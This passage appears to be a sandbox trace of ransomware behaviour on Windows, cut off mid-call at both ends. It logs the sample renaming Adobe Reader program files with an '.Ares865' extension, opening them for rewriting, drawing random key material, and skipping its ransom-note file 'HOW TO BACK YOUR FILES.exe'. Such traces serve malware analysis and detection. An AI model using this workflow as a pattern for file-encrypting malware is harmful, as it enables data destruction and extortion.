CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0166.128] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0166.128] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.144] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0166.145] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0166.145] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.149] lstrcpyW (in: lpString1=0x2cce460, lpString2="AGM.dll" | out: lpString1="AGM.dll") returned="AGM.dll" [0166.150] lstrlenW (lpString="AGM.dll") returned 7 [0166.150] lstrlenW (lpString="Ares865") returned 7 [0166.150] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGM.dll.Ares865") returned 63 [0166.150] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGM.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agm.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGM.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agm.dll.ares865"), dwFlags=0x1) returned 1 [0166.152] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGM.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agm.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0166.152] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5503368) returned 1 [0166.153] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0166.153] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0166.153] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.355] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0166.355] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0166.355] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.376] lstrcpyW (in: lpString1=0x2cce460, lpString2="AGMGPUOptIn.ini" | out: lpString1="AGMGPUOptIn.ini") returned="AGMGPUOptIn.ini" [0166.376] lstrlenW (lpString="AGMGPUOptIn.ini") returned 15 [0166.376] lstrlenW (lpString="Ares865") returned 7 [0166.376] lstrcmpiW (lpString1="tIn.ini", lpString2="Ares865") returned 1 [0166.376] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini.Ares865") returned 71 [0166.376] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agmgpuoptin.ini"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agmgpuoptin.ini.ares865"), dwFlags=0x1) returned 1 [0166.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agmgpuoptin.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0166.380] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1727) returned 1 [0166.380] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0166.381] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0166.381] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.384] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0166.384] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0166.384] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.385] lstrcpyW (in: lpString1=0x2cce460, lpString2="ahclient.dll" | out: lpString1="ahclient.dll") returned="ahclient.dll" [0166.385] lstrlenW (lpString="ahclient.dll") returned 12 [0166.385] lstrlenW (lpString="Ares865") returned 7 [0166.385] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0166.385] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ahclient.dll.Ares865") returned 68 [0166.385] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ahclient.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ahclient.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ahclient.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ahclient.dll.ares865"), dwFlags=0x1) returned 1 [0166.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ahclient.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ahclient.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0166.389] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222920) returned 1 [0166.389] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0166.390] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0166.390] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.400] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0166.401] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0166.401] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.404] lstrcpyW (in: lpString1=0x2cce460, lpString2="AIR" | out: lpString1="AIR") returned="AIR" [0166.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78e8 [0166.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2d2ef0 [0166.405] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78f0 | out: ListHead=0x2e7710, ListEntry=0x2e78f0) returned 0x2e78d0 [0166.405] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5ef398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="authplay.dll", cAlternateFileName="")) returned 1 [0166.405] lstrcmpiW (lpString1="authplay.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0166.405] lstrcmpiW (lpString1="authplay.dll", lpString2="aoldtz.exe") returned 1 [0166.405] lstrcpyW (in: lpString1=0x2cce460, lpString2="authplay.dll" | out: lpString1="authplay.dll") returned="authplay.dll" [0166.405] lstrlenW (lpString="authplay.dll") returned 12 [0166.405] lstrlenW (lpString="Ares865") returned 7 [0166.405] lstrcmpiW (lpString1="lay.dll", lpString2="Ares865") returned 1 [0166.405] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\authplay.dll.Ares865") returned 68 [0166.405] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\authplay.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\authplay.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\authplay.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\authplay.dll.ares865"), dwFlags=0x1) returned 1 [0166.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\authplay.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\authplay.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0166.411] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6222744) returned 1 [0166.411] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0166.412] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0166.412] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.764] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0166.764] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0166.764] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.791] lstrcpyW (in: lpString1=0x2cce460, lpString2="AXE8SharedExpat.dll" | out: lpString1="AXE8SharedExpat.dll") returned="AXE8SharedExpat.dll" [0166.791] lstrlenW (lpString="AXE8SharedExpat.dll") returned 19 [0166.791] lstrlenW (lpString="Ares865") returned 7 [0166.791] lstrcmpiW (lpString1="pat.dll", lpString2="Ares865") returned 1 [0166.792] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AXE8SharedExpat.dll.Ares865") returned 75 [0166.792] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AXE8SharedExpat.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\axe8sharedexpat.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AXE8SharedExpat.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\axe8sharedexpat.dll.ares865"), dwFlags=0x1) returned 1 [0166.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AXE8SharedExpat.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\axe8sharedexpat.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0166.795] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174496) returned 1 [0166.796] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0166.796] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0166.796] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.805] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0166.806] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0166.806] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.808] lstrcpyW (in: lpString1=0x2cce460, lpString2="AXSLE.dll" | out: lpString1="AXSLE.dll") returned="AXSLE.dll" [0166.809] lstrlenW (lpString="AXSLE.dll") returned 9 [0166.809] lstrlenW (lpString="Ares865") returned 7 [0166.809] lstrcmpiW (lpString1="SLE.dll", lpString2="Ares865") returned 1 [0166.809] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AXSLE.dll.Ares865") returned 65 [0166.809] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AXSLE.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\axsle.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AXSLE.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\axsle.dll.ares865"), dwFlags=0x1) returned 1 [0166.811] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AXSLE.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\axsle.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0166.811] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=595344) returned 1 [0166.811] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0166.812] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0166.812] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.397] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0167.398] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0167.398] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.406] lstrcpyW (in: lpString1=0x2cce460, lpString2="BIB.dll" | out: lpString1="BIB.dll") returned="BIB.dll" [0167.406] lstrlenW (lpString="BIB.dll") returned 7 [0167.406] lstrlenW (lpString="Ares865") returned 7 [0167.407] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIB.dll.Ares865") returned 63 [0167.407] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIB.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bib.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIB.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bib.dll.ares865"), dwFlags=0x1) returned 1 [0167.410] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIB.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bib.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0167.410] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=110472) returned 1 [0167.411] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0167.411] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0167.411] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.420] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0167.421] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0167.421] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.423] lstrcpyW (in: lpString1=0x2cce460, lpString2="BIBUtils.dll" | out: lpString1="BIBUtils.dll") returned="BIBUtils.dll" [0167.423] lstrlenW (lpString="BIBUtils.dll") returned 12 [0167.423] lstrlenW (lpString="Ares865") returned 7 [0167.423] lstrcmpiW (lpString1="ils.dll", lpString2="Ares865") returned 1 [0167.423] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIBUtils.dll.Ares865") returned 68 [0167.423] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIBUtils.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bibutils.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIBUtils.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bibutils.dll.ares865"), dwFlags=0x1) returned 1 [0167.425] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIBUtils.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bibutils.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0167.425] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=154520) returned 1 [0167.425] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0167.426] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0167.426] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.463] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0167.464] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0167.464] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.466] lstrcpyW (in: lpString1=0x2cce460, lpString2="Browser" | out: lpString1="Browser") returned="Browser" [0167.466] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0167.466] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4710 [0167.466] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0167.466] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x802ba700, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1b4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ccme_base.dll", cAlternateFileName="CCME_B~1.DLL")) returned 1 [0167.466] lstrcmpiW (lpString1="ccme_base.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0167.466] lstrcmpiW (lpString1="ccme_base.dll", lpString2="aoldtz.exe") returned 1 [0167.467] lstrcpyW (in: lpString1=0x2cce460, lpString2="ccme_base.dll" | out: lpString1="ccme_base.dll") returned="ccme_base.dll" [0167.467] lstrlenW (lpString="ccme_base.dll") returned 13 [0167.467] lstrlenW (lpString="Ares865") returned 7 [0167.467] lstrcmpiW (lpString1="ase.dll", lpString2="Ares865") returned 1 [0167.467] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ccme_base.dll.Ares865") returned 69 [0167.467] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ccme_base.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ccme_base.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ccme_base.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ccme_base.dll.ares865"), dwFlags=0x1) returned 1 [0167.470] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ccme_base.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ccme_base.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0167.470] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1785856) returned 1 [0167.470] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0167.471] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0167.471] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.668] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0167.668] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0167.668] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.692] lstrcpyW (in: lpString1=0x2cce460, lpString2="CoolType.dll" | out: lpString1="CoolType.dll") returned="CoolType.dll" [0167.692] lstrlenW (lpString="CoolType.dll") returned 12 [0167.692] lstrlenW (lpString="Ares865") returned 7 [0167.692] lstrcmpiW (lpString1="ype.dll", lpString2="Ares865") returned 1 [0167.693] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\CoolType.dll.Ares865") returned 68 [0167.693] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\CoolType.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cooltype.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\CoolType.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cooltype.dll.ares865"), dwFlags=0x1) returned 1 [0167.697] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\CoolType.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cooltype.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0167.697] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2795928) returned 1 [0167.697] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0167.698] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0167.698] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.862] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0167.863] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0167.863] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0167.879] lstrcpyW (in: lpString1=0x2cce460, lpString2="cryptocme2.dll" | out: lpString1="cryptocme2.dll") returned="cryptocme2.dll" [0167.879] lstrlenW (lpString="cryptocme2.dll") returned 14 [0167.879] lstrlenW (lpString="Ares865") returned 7 [0167.879] lstrcmpiW (lpString1="me2.dll", lpString2="Ares865") returned 1 [0167.879] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.dll.Ares865") returned 70 [0167.879] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cryptocme2.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cryptocme2.dll.ares865"), dwFlags=0x1) returned 1 [0167.883] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cryptocme2.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0167.883] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1839104) returned 1 [0167.884] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0167.885] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0167.885] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.006] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.006] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, 